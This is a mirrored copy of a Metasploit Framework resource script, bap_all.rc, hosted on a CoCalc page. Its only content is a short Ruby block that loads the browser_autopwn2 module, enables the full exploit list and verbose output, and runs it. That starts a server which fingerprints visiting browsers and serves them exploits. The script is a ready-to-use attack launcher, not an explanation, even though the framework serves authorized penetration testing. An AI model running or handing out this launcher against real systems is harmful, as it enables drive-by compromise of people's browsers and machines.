CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/resource/bap_all.rc
Views: 1904
<ruby>
run_single("use auxiliary/server/browser_autopwn2")
run_single("set ShowExploitList true")
run_single("set VERBOSE true")
run_single("run")
</ruby>